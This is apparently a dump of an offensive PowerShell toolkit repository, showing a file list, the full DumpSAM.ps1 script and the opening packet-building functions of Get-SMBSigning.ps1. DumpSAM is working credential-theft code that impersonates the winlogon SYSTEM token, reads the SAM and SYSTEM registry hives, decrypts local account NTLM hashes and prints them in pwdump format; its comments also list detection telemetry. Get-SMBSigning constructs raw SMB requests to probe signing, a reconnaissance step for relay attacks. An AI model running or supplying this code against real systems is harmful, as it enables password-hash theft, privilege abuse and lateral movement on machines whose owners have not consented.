├── DumpSAM.ps1 ├── Get-SMBSigning.ps1 ├── Invoke-MSSQLup.ps1 ├── Invoke-Mongoose.ps1 ├── Invoke-NETMongoose.ps1 ├── Invoke-NTDS.ps1 ├── Invoke-Pandemonium.ps1 ├── Invoke-SharpRDPTest.ps1 └── Kirby.ps1 /DumpSAM.ps1: -------------------------------------------------------------------------------- 1 | <# DumpSAM: reads the local SAM and SYSTEM hives through the registry while impersonating the winlogon.exe (SYSTEM) token and writes one pwdump-format line per local account (Username:RID:<constant empty-LM field>:NTLM:::). $ErrorActionPreference is SilentlyContinue for the whole function, so any failure (e.g. insufficient rights, a P/Invoke compile error, an unreadable key) shows up as missing output rather than as an error. Telemetry a defender can key on: an in-memory Add-Type compile of P/Invoke stubs from a PowerShell host, OpenProcess/OpenProcessToken/DuplicateTokenEx against winlogon.exe, and registry reads under HKLM\SAM\SAM\Domains\Account and HKLM\SYSTEM\CurrentControlSet\Control\Lsa. #>function DumpSAM{$ErrorActionPreference = "SilentlyContinue" 2 | try{&{[void][impsys.win32]}}catch{Add-Type -TypeDefinition "using System;using System.Runtime.InteropServices;namespace impsys{public class win32{[DllImport(`"kernel32.dll`",SetLastError=true)]public static extern bool CloseHandle(IntPtr hHandle);[DllImport(`"kernel32.dll`",SetLastError=true)]public static extern IntPtr OpenProcess(uint processAccess,bool bInheritHandle,int processId);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool OpenProcessToken(IntPtr ProcessHandle,uint DesiredAccess,out IntPtr TokenHandle);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool DuplicateTokenEx(IntPtr hExistingToken,uint dwDesiredAccess,IntPtr lpTokenAttributes,uint ImpersonationLevel,uint TokenType,out IntPtr phNewToken);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool RevertToSelf();}}"} 3 | <# IAS: runs $Process with $ArgumentList while impersonating a duplicate of winlogon.exe's primary token, and always calls RevertToSelf in finally. Each Win32 failure only stores the last error in $c, which is never read, so a failed OpenProcess/OpenProcessToken/DuplicateTokenEx still proceeds to ImpersonateLoggedOnUser with a zero handle. #>function IAS{[CmdletBinding()]param([Parameter(Mandatory=$true,Position=0)][scriptblock]$Process,[Parameter(Position=1)][object[]]$ArgumentList);$a=GPS -Name "winlogon"|Select -First 1 -ExpandProperty Id;if(($b=[impsys.win32]::OpenProcess(0x400,$true,[Int32]$a)) -eq [IntPtr]::Zero){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$d=[IntPtr]::Zero;if(-not [impsys.win32]::OpenProcessToken($b,0x0E,[ref]$d)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$f=[IntPtr]::Zero;if(-not [impsys.win32]::DuplicateTokenEx($d,0x02000000,[IntPtr]::Zero,0x02,0x01,[ref]$f)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}try{if(-not 
[impsys.win32]::ImpersonateLoggedOnUser($f)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}& $Process @ArgumentList}finally{if(-not [impsys.win32]::RevertToSelf()){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}}} 4 | <# Compiles ntlmx.win32 once: RegOpenKeyEx/RegQueryInfoKey/RegCloseKey stubs that GNLPH uses to read registry key class strings (the lpClass output of RegQueryInfoKey). #>try{&{[void][ntlmx.win32]}}catch{Add-Type -TypeDefinition "using System;using System.Text;using System.Runtime.InteropServices;namespace ntlmx{public class win32{[DllImport(`"advapi32.dll`",SetLastError=true,CharSet=CharSet.Auto)]public static extern int RegOpenKeyEx(IntPtr hKey,string subKey,int ulOptions,int samDesired,out IntPtr hkResult);[DllImport(`"advapi32.dll`",SetLastError=true,CharSet=CharSet.Auto)]public static extern int RegQueryInfoKey(IntPtr hkey,StringBuilder lpClass,ref int lpcbClass,int lpReserved,out int lpcSubKeys,out int lpcbMaxSubKeyLen,out int lpcbMaxClassLen,out int lpcValues,out int lpcbMaxValueNameLen,out int lpcbMaxValueLen,out int lpcbSecurityDescriptor,IntPtr lpftLastWriteTime);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern int RegCloseKey(IntPtr hKey);}}"} 5 | <# GNLPH: for every HKLM:SAM\SAM\Domains\Account\Users key whose name is an 8-hex-digit RID, reads that user's V value and the domain F value, derives the decryption key from the SYSTEM hive, and decrypts the account's stored NT hash, handling two on-disk formats (switch on $v[0xAC]); an unrecognised format yields the well-known empty-password NT hash. Emits one PSObject per account with Username, RID and NTLM. The SAM hive is only readable as SYSTEM, which is why DumpSAM invokes this through IAS. The MD5/AES/DES objects created here are never disposed. #>function GNLPH{GCI "HKLM:SAM\SAM\Domains\Account\Users"|?{$_.PSChildName -match "^[0-9A-F]{8}$"}|%{$ae=$_.PSChildName;$v=(Get-ItemProperty "HKLM:SAM\SAM\Domains\Account\Users\$ae" -Name V).V;$f=(Get-ItemProperty "HKLM:SAM\SAM\Domains\Account" -Name F).F;$xc=-join(&{"JD","Skew1","GBG","Data"|%{$ou=[IntPtr]::Zero;if([ntlmx.win32]::RegOpenKeyEx(0x80000002,"SYSTEM\CurrentControlSet\Control\Lsa\$_",0x0,0x19,[ref]$ou)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error();throw [ComponentModel.Win32Exception]$e}$lp=New-Object Text.StringBuilder 1024;[int]$oz=1024;if([ntlmx.win32]::RegQueryInfoKey($ou,$lp,[ref]$oz,0x0,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[IntPtr]::Zero)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error();throw 
[ComponentModel.Win32Exception]$e}[void][ntlmx.win32]::RegCloseKey($ou);$lp.ToString()}});$md5=[Security.Cryptography.MD5]::Create();$q=[Security.Cryptography.Aes]::Create();$q.Mode=[Security.Cryptography.CipherMode]::CBC;$q.Padding=[Security.Cryptography.PaddingMode]::None;$q.KeySize=128;$k=[Security.Cryptography.DES]::Create();$k.Mode=[Security.Cryptography.CipherMode]::ECB;$k.Padding=[Security.Cryptography.PaddingMode]::None;$uu=[BitConverter]::ToInt32($v,0x0C)+0xCC;$len=[BitConverter]::ToInt32($v,0x10);$username=[Text.Encoding]::Unicode.GetString($v,$uu,$len);$uu=[Bitconverter]::ToInt32($v,0xA8)+0xCC;$bk=8,5,4,2,11,9,13,3,0,6,1,12,14,10,15,7|%{[Convert]::ToByte("$($xc[$_*2])$($xc[$_*2+1])",16)};switch($v[0xAC]){0x38{$enc_syskey=$f[0x88..0x97];$enc_syskey_iv=$f[0x78..0x87];$enc_syskey_key=$bk;$syskey=$q.CreateDecryptor($enc_syskey_key,$enc_syskey_iv).TransformFinalBlock($enc_syskey,0,16);$enc_ntlm=$v[($uu+24)..($uu+24+0x0F)];$enc_ntlm_iv=$v[($uu+8)..($uu+23)];$enc_ntlm_key=$syskey;$enc_ntlm=$q.CreateDecryptor($enc_ntlm_key,$enc_ntlm_iv).TransformFinalBlock($enc_ntlm,0,16)}0x14{$enc_syskey=$f[0x80..0x8f];$enc_syskey_key=$md5.ComputeHash($f[0x70..0x7f]+[Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0")+$bk+[Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"));$syskey=rc4 $enc_syskey $enc_syskey_key;$enc_ntlm=$v[($uu+4)..($uu+4+0x0F)];$enc_ntlm_key=$md5.ComputeHash($syskey+(3,2,1,0|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)})+[Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"));$enc_ntlm=rc4 $enc_ntlm $enc_ntlm_key}default{New-Object PSObject -Property @{Username=$username;RID=[int]"0x$ae";NTLM="31D6CFE0D16AE931B73C59D7E0C089C0"}}}$k_str_1=3,2,1,0,3,2,1|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)};$k_str_2=0,3,2,1,0,3,2|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)};$k_key_1=str_to_key $k_str_1;$k_key_2=str_to_key 
$k_str_2;$ntlm_1=$k.CreateDecryptor($k_key_1,$k_key_1).TransformFinalBlock($enc_ntlm,0,8);$ntlm_2=$k.CreateDecryptor($k_key_2,$k_key_2).TransformFinalBlock($enc_ntlm,8,8);$ntlm=[BitConverter]::ToString($ntlm_1+$ntlm_2)-replace '-','';New-Object PSObject -Property @{Username=$username;RID=[int]"0x$ae";NTLM=$ntlm}}} 6 | <# rc4: plain RC4 keystream XOR of $d under key $k (key scheduling over $k repeated 256 times, then the output loop). $r aliases $d, so the input array is transformed in place and then returned. #>function rc4($d,$k){$r=$d;$s,$k=@(0..255),@($k*256);$j=0;0..255|%{$j=($j+$s[$_]+$k[$_])%256;$s[$_],$s[$j]=$s[$j],$s[$_]} 7 | $i=$j=0;0..($r.Length-1)|%{$i=($i+1)%256;$j=($j+$s[$i])%256;$s[$i],$s[$j]=$s[$j],$s[$i];$t=($s[$i]+$s[$j])%256;$r[$_]=$r[$_]-bxor$s[$t]};$r} 8 | <# str_to_key: spreads a 7-byte array into an 8-byte DES key, fixing the parity bit of each byte through the $odd_parity table. #>function str_to_key($s) { 9 | $odd_parity=@(1,1,2,2,4,4,7,7,8,8,11,11,13,13,14,14,16,16,19,19,21,21,22,22,25,25,26,26,28,28,31,31,32,32,35,35,37,37,38,38,41,41,42,42,44,44,47,47,49,49,50,50,52,52,55,55,56,56,59,59,61,61,62,62,64,64,67,67,69,69,70,70,73,73,74,74,76,76,79,79,81,81,82,82,84,84,87,87,88,88,91,91,93,93,94,94,97,97,98,98,100,100,103,103,104,104,107,107,109,109,110,110,112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254);$0=@();$0+=bitshift $s[0]-1;$0+=(bitshift ($s[0]-band 0x01) 6)-bor(bitshift $s[1]-2);$0+=(bitshift ($s[1]-band 0x03) 5)-bor(bitshift $s[2]-3);$0+=(bitshift ($s[2]-band 0x07) 4)-bor(bitshift $s[3]-4);$0+=(bitshift ($s[3]-band 0x0F) 3)-bor(bitshift $s[4]-5);$0+=(bitshift ($s[4]-band 0x1F) 2)-bor(bitshift $s[5]-6);$0+=(bitshift ($s[5]-band 0x3F) 1)-bor(bitshift $s[6]-7);$0+=$s[6]-band 0x7F;$0[0]=$odd_parity[(bitshift $0[0] 
1)];$0[1]=$odd_parity[(bitshift $0[1] 1)];$0[2]=$odd_parity[(bitshift $0[2] 1)];$0[3]=$odd_parity[(bitshift $0[3] 1)];$0[4]=$odd_parity[(bitshift $0[4] 1)];$0[5]=$odd_parity[(bitshift $0[5] 1)];$0[6]=$odd_parity[(bitshift $0[6] 1)];$0[7]=$odd_parity[(bitshift $0[7] 1)];$0} 10 | <# bitshift: shifts $x left by $c bits (a negative $c shifts right) as Math.Floor($x * 2^$c); the result is a [double], which callers use directly as an array index. #>function bitshift($x, $c){return [math]::Floor($x * [math]::Pow(2, $c))} 11 | <# Entry point: collects the GNLPH objects under the impersonated token, skips the built-in accounts listed in $excludedUsernames, and prints one pwdump line per remaining user with the constant empty-LM field. $output and $Output are the same variable (PowerShell variable names are case-insensitive). #>$users=IAS -Process {GNLPH};$excludedUsernames=@("Guest","DefaultAccount","WDAGUtilityAccount");foreach($user in $users){if($user.Username-notin$excludedUsernames){$output="$($user.Username):$($user.RID):aad3b435b51404eeaad3b435b51404ee:$($user.NTLM.ToLower()):::";$Output}}} 12 | DumpSAM 13 | -------------------------------------------------------------------------------- /Get-SMBSigning.ps1: -------------------------------------------------------------------------------- 1 | Function Get-SMBSigning { 2 | 3 | Param ( 4 | [String]$Target, 5 | [String[]]$Targets=@(), 6 | [Float]$Delay, 7 | [Float]$DelayJitter 8 | ) 9 | 10 | #borrowed from https://github.com/Kevin-Robertson/Inveigh/blob/master/Scripts/Inveigh-Relay.ps1 11 | function ConvertFrom-PacketOrderedDictionary 12 | { 13 | param($packet_ordered_dictionary) 14 | 15 | ForEach($field in $packet_ordered_dictionary.Values) 16 | { 17 | $byte_array += $field 18 | } 19 | 20 | return $byte_array 21 | } 22 | 23 | #NetBIOS 24 | 25 | function Get-PacketNetBIOSSessionService() 26 | { 27 | param([Int]$packet_header_length,[Int]$packet_data_length) 28 | 29 | [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length) 30 | $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0] 31 | 32 | $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary 33 | $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type",[Byte[]](0x00)) 34 | 
$packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length",[Byte[]]($packet_netbios_session_service_length)) 35 | 36 | return $packet_NetBIOSSessionService 37 | } 38 | 39 | #SMB1 40 | 41 | function Get-PacketSMBHeader() 42 | { 43 | param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) 44 | 45 | $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary 46 | $packet_SMBHeader.Add("SMBHeader_Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) 47 | $packet_SMBHeader.Add("SMBHeader_Command",$packet_command) 48 | $packet_SMBHeader.Add("SMBHeader_ErrorClass",[Byte[]](0x00)) 49 | $packet_SMBHeader.Add("SMBHeader_Reserved",[Byte[]](0x00)) 50 | $packet_SMBHeader.Add("SMBHeader_ErrorCode",[Byte[]](0x00,0x00)) 51 | $packet_SMBHeader.Add("SMBHeader_Flags",$packet_flags) 52 | $packet_SMBHeader.Add("SMBHeader_Flags2",$packet_flags2) 53 | $packet_SMBHeader.Add("SMBHeader_ProcessIDHigh",[Byte[]](0x00,0x00)) 54 | $packet_SMBHeader.Add("SMBHeader_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 55 | $packet_SMBHeader.Add("SMBHeader_Reserved2",[Byte[]](0x00,0x00)) 56 | $packet_SMBHeader.Add("SMBHeader_TreeID",$packet_tree_ID) 57 | $packet_SMBHeader.Add("SMBHeader_ProcessID",$packet_process_ID) 58 | $packet_SMBHeader.Add("SMBHeader_UserID",$packet_user_ID) 59 | $packet_SMBHeader.Add("SMBHeader_MultiplexID",[Byte[]](0x00,0x00)) 60 | 61 | return $packet_SMBHeader 62 | } 63 | 64 | function Get-PacketSMBNegotiateProtocolRequest() 65 | { 66 | param([String]$packet_version) 67 | 68 | if($packet_version -eq "SMB1") 69 | { 70 | [Byte[]]$packet_byte_count = 0x0c,0x00 71 | } 72 | else 73 | { 74 | [Byte[]]$packet_byte_count = 0x22,0x00 75 | } 76 | 77 | $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary 78 | $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount",[Byte[]](0x00)) 79 | 
$packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount",$packet_byte_count) 80 | $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02)) 81 | $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00)) 82 | 83 | if($packet_version -ne "SMB1") 84 | { 85 | $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02)) 86 | $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00)) 87 | $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02)) 88 | $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00)) 89 | } 90 | 91 | return $packet_SMBNegotiateProtocolRequest 92 | } 93 | 94 | function Get-PacketSMBSessionSetupAndXRequest() 95 | { 96 | param([Byte[]]$packet_security_blob) 97 | 98 | [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length) 99 | $packet_byte_count = $packet_byte_count[0,1] 100 | [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5) 101 | $packet_security_blob_length = $packet_security_blob_length[0,1] 102 | 103 | $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary 104 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount",[Byte[]](0x0c)) 105 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand",[Byte[]](0xff)) 106 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved",[Byte[]](0x00)) 107 | 
$packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) 108 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer",[Byte[]](0xff,0xff)) 109 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount",[Byte[]](0x02,0x00)) 110 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber",[Byte[]](0x01,0x00)) 111 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey",[Byte[]](0x00,0x00,0x00,0x00)) 112 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength",$packet_byte_count) 113 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) 114 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities",[Byte[]](0x44,0x00,0x00,0x80)) 115 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount",$packet_security_blob_length) 116 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob",$packet_security_blob) 117 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS",[Byte[]](0x00,0x00,0x00)) 118 | $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage",[Byte[]](0x00,0x00)) 119 | 120 | return $packet_SMBSessionSetupAndXRequest 121 | } 122 | 123 | function Get-PacketSMBTreeConnectAndXRequest() 124 | { 125 | param([Byte[]]$packet_path) 126 | 127 | [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7) 128 | $packet_path_length = $packet_path_length[0,1] 129 | 130 | $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary 131 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount",[Byte[]](0x04)) 132 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand",[Byte[]](0xff)) 133 | 
$packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved",[Byte[]](0x00)) 134 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) 135 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags",[Byte[]](0x00,0x00)) 136 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength",[Byte[]](0x01,0x00)) 137 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount",$packet_path_length) 138 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password",[Byte[]](0x00)) 139 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree",$packet_path) 140 | $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00)) 141 | 142 | return $packet_SMBTreeConnectAndXRequest 143 | } 144 | 145 | function Get-PacketSMBNTCreateAndXRequest() 146 | { 147 | param([Byte[]]$packet_named_pipe) 148 | 149 | [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length) 150 | $packet_named_pipe_length = $packet_named_pipe_length[0,1] 151 | [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1) 152 | $packet_file_name_length = $packet_file_name_length[0,1] 153 | 154 | $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary 155 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount",[Byte[]](0x18)) 156 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand",[Byte[]](0xff)) 157 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved",[Byte[]](0x00)) 158 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) 159 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2",[Byte[]](0x00)) 160 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen",$packet_file_name_length) 161 | 
$packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags",[Byte[]](0x16,0x00,0x00,0x00)) 162 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID",[Byte[]](0x00,0x00,0x00,0x00)) 163 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask",[Byte[]](0x00,0x00,0x00,0x02)) 164 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 165 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes",[Byte[]](0x00,0x00,0x00,0x00)) 166 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess",[Byte[]](0x07,0x00,0x00,0x00)) 167 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition",[Byte[]](0x01,0x00,0x00,0x00)) 168 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions",[Byte[]](0x00,0x00,0x00,0x00)) 169 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation",[Byte[]](0x02,0x00,0x00,0x00)) 170 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags",[Byte[]](0x00)) 171 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount",$packet_named_pipe_length) 172 | $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename",$packet_named_pipe) 173 | 174 | return $packet_SMBNTCreateAndXRequest 175 | } 176 | 177 | function Get-PacketSMBReadAndXRequest() 178 | { 179 | $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary 180 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount",[Byte[]](0x0a)) 181 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand",[Byte[]](0xff)) 182 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved",[Byte[]](0x00)) 183 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) 184 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID",[Byte[]](0x00,0x40)) 185 | 
$packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00)) 186 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow",[Byte[]](0x58,0x02)) 187 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount",[Byte[]](0x58,0x02)) 188 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown",[Byte[]](0xff,0xff,0xff,0xff)) 189 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining",[Byte[]](0x00,0x00)) 190 | $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount",[Byte[]](0x00,0x00)) 191 | 192 | return $packet_SMBReadAndXRequest 193 | } 194 | 195 | function Get-PacketSMBWriteAndXRequest() 196 | { 197 | param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length) 198 | 199 | [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length) 200 | $packet_write_length = $packet_write_length[0,1] 201 | 202 | $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary 203 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount",[Byte[]](0x0e)) 204 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand",[Byte[]](0xff)) 205 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved",[Byte[]](0x00)) 206 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) 207 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID",$packet_file_ID) 208 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset",[Byte[]](0xea,0x03,0x00,0x00)) 209 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2",[Byte[]](0xff,0xff,0xff,0xff)) 210 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode",[Byte[]](0x08,0x00)) 211 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining",$packet_write_length) 212 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh",[Byte[]](0x00,0x00)) 213 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow",$packet_write_length) 214 | 
$packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset",[Byte[]](0x3f,0x00)) 215 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset",[Byte[]](0x00,0x00,0x00,0x00)) 216 | $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount",$packet_write_length) 217 | 218 | return $packet_SMBWriteAndXRequest 219 | } 220 | 221 | function Get-PacketSMBCloseRequest() 222 | { 223 | param ([Byte[]]$packet_file_ID) 224 | 225 | $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary 226 | $packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount",[Byte[]](0x03)) 227 | $packet_SMBCloseRequest.Add("SMBCloseRequest_FID",$packet_file_ID) 228 | $packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite",[Byte[]](0xff,0xff,0xff,0xff)) 229 | $packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount",[Byte[]](0x00,0x00)) 230 | 231 | return $packet_SMBCloseRequest 232 | } 233 | 234 | function Get-PacketSMBTreeDisconnectRequest() 235 | { 236 | $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary 237 | $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount",[Byte[]](0x00)) 238 | $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount",[Byte[]](0x00,0x00)) 239 | 240 | return $packet_SMBTreeDisconnectRequest 241 | } 242 | 243 | function Get-PacketSMBLogoffAndXRequest() 244 | { 245 | $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary 246 | $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount",[Byte[]](0x02)) 247 | $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand",[Byte[]](0xff)) 248 | $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved",[Byte[]](0x00)) 249 | $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) 250 | $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount",[Byte[]](0x00,0x00)) 251 | 252 | return $packet_SMBLogoffAndXRequest 253 | } 
